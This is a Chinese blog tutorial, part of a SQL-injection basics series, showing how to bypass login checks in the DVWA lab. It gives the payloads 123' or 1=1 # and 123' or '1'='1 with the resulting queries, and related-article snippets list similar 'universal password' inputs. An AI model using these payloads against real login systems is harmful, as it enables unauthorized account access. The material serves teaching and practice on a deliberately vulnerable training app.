SQL 注入基础系列2——利用 SQL 漏洞绕过登录验证

最新推荐文章于 2024-07-22 18:24:26 发布
最新推荐文章于 2024-07-22 18:24:26 发布
阅读量796 收藏 8
点赞数 3
分类专栏: shiyanlou 文章标签: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_37537965/article/details/85262922
版权

DVWA->SQL Injection

//后台sql语句
select * from users where username='$name' and password='$pwd';

当查询到数据表中存在同时满足 username 和 password 字段的数据时,会返回登录成功。例如,用户名为admin,密码为123时:

//实际执行语句
select * from users where username='admin' and password='123';
  • 使用注释绕过验证

在用户名中输入 123' or 1=1 #,密码中同样输入 123' or 1=1 #

按照 Mysql 语法,# 后面的内容会被注释掉,所以密码也可以不填。

//示例一
SELECT first_name, last_name FROM users WHERE user_id = '123' or 1=1 #';

//示例二
select * from users where username='123' or 1=1 #' and password='123' or 1=1 #';

select * from users where username='123' or 1=1; #' and password='123' or 1=1; #';

 

  • 不做注释,手动闭合绕过验证
//构造输入 123' or '1'='1
select * from users where username='123' or '1'='1' and password='123' or '1'='1'

两个 or 语句使 and 前后两个判断恒等于真,所以能够成功登录。

 

TalkActor
关注
专栏目录
sql注入万能密码
05-19
sql注入万能密码 全部的万能代码 如"or "a"="a 等等很多
【超详细版】SQL注入原理及思路绕过(看这篇就够了)
热门推荐
fly_enum的博客
12-30 2万+
当web应用向后台数据库传递SQL语句进行数据库操作时,如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。
墨者SQL注入漏洞测试(登录绕过)解题方法
最新发布
网安小白
07-22 131
一位网站管理员声称自己的管理员密码设置的十分复杂,是不可能被破解的;没想到被渗透测试人员一举拿下,请你也帮他试试看能不能登录管理员账户。2、掌握数据库和网页的注释符;3直接用户名输入admin’#1、了解常用网站万能密码登录绕过一般的语法格式如下。利用万能密码绕过登录验证。2,利用万能密码登录绕过密码随便输入什么都行。
【Web安全】SQL各类注入绕过
2401_84281638的博客
04-27 1184
其中concat()函数为连接函数,连接波浪号和查询信息,波浪号常常使用0x7e代替,substr为截取函数,因为报错信息最多32位,或者使用limit分页函数。
SQL注入绕过登陆界面
weixin_73094474的博客
03-06 2610
【代码】SQL注入绕过登陆界面。
SQL注入原理及思路(绕过)-超详细
weixin_52501704的博客
05-17 3038
(1)user() 返回当前使用数据库的用户,也就是网站配置文件中连接数据库的账号 (2)version() 返回当前数据库的版本 (3)database() 返回当前使用的数据库,只有在use命令选择一个数据库之后,才能查到 (4)group_concat() 把数据库中的某列数据或某几列数据合并为一个字符串 (5)@@datadir 数据库路径 (6)@@version_compile_os 操作系统版本。通过+1、-1、and 1=1、and 1=2、注释符。或者通过报错注入是网页返回报错信息。
SQL注入漏洞测试(登录绕过)
weixin_47493074的博客
10-05 1193
SQL注入漏洞测试(登录绕过)
sql注入绕过密码登录详解
qq_40800734的博客
03-22 5702
一.环境 关键源码:$qry="SELECT*FROM`users`WHEREuser='$user'ANDpassword='$pass';"; 用户名是admin;密码是password 二.绕过密码登录 1.构造admin' or '1' ='1(当然是用admin'# 用#号注释掉后面的语句也可以) 传入后变成 select * from 'u...
SQL注入中万能密码的原理详解
Yuppie001的博客
11-26 2559
2.然后再通过#将后面的password注释掉,这样整个查询条件为真,相当于where条件没了,查询整个字段的数据。注:在现在的应用程序已经很难用万能密码进行绕过了,本篇文章仅仅讨论万能密码绕过的原理。我们直接使用万能密码:admin’ or 1=1 #进行绕过密码随便输。1.用户通过表单输入用户名和密码,并且该表单通过POST方法提交到服务器。由于本次只讲解万能密码的原理,后面的步骤就不具体演示了。具体的原理知道了,你也来构造一个万能密码把!可以发现需要登录用户名和密码来进行登录
SQL注入简单总结——过滤逗号注入.pdf
04-08
SQL注入是一种常见的安全漏洞,通常发生在应用程序将用户输入的数据直接拼接到SQL查询语句中,而不进行充分的验证和转义。"SQL注入简单总结——过滤逗号注入"的主题主要探讨了如何处理那些针对逗号(`,`)进行过滤的...
SQL注入防护——从一款注入工具入侵原理入手.pdf
09-19
SQL注入是一种常见的网络攻击手段,攻击者通过在Web应用程序的输入字段中插入恶意的SQL代码片段,使得原本用于数据查询和管理的SQL语句被篡改,从而让攻击者能够绕过应用程序的安全限制,直接对数据库进行操作。SQL...
SQL注入漏洞的分析及防范.pdf
09-19
SQL注入是一种常见的网络安全威胁,源于Web应用程序未能有效验证和过滤用户输入的数据。当攻击者能够将恶意SQL代码插入到应用程序的SQL查询中时,他们就能操控数据库,获取、修改、甚至删除敏感信息。本文主要围绕...
开发者视角下网站SQL注入漏洞及防范.pdf
09-19
从给定的内容来看,该文档主要关注于网站开发中常遇到的安全问题之一——SQL注入漏洞,以及如何在开发阶段预防此类漏洞。以下是文档中所涉及知识点的详细解释: SQL注入漏洞成因与常见类型分析: SQL注入漏洞是由于...
sql注入是一种代码注入技术.docx
07-12
这种攻击手段利用了软件设计中的一个关键漏洞——未能正确验证和过滤用户输入数据,从而使恶意代码得以被当作正常查询的一部分执行。 ### SQL注入的工作原理 SQL注入攻击的核心在于攻击者利用目标系统处理用户输入...
Vulnhub_CengBox
weixin_44193247的博客
11-09 4404
Vulnhub_CengBox
常见 SQL 注入绕过方法
Flag少侠的博客
04-25 1936
Web应用通常会使用输入过滤器,设计这些过滤器的目的是防御包括SOL 注入在内的常见攻击。这些过滤器可能位于应用的代码中(自定义输入验证方式),也可能在应用外部实现,形式为 Web应用防火墙(WAF)或入侵防御系统(IPS)
SQL注入绕过(passby)策略
Megumiwind的博客
08-09 1455
例题:[极客大挑战 2019]BabySQL1 首先输入万能密码进行尝试:' or '1'='1-- -,发现回显是错误用户名和密码,说明没有注入成功,然后输入在用户名处输入1'发现报错。 根据报错信息推断出闭合的条件就是单引号',所以继续在用户名处输入1'-- -,密码:1(一下密码不做特殊声明外均为1)进一步验证判断是否正确。 ...
SQL注入 | 黑客入门篇(如何绕过密码登陆账号)
weixin_44328211的博客
05-23 8485
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
wechall mysql题解
为之的博客
10-17 863
19.10.17 1.Training: MySQL I(MySQL,Exploit,Training) https://www.wechall.net/challenge/training/mysql/auth_bypass1/index.php 看了源代码,知道其sql语句为 SELECT * FROM users WHERE username='$username' AN...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值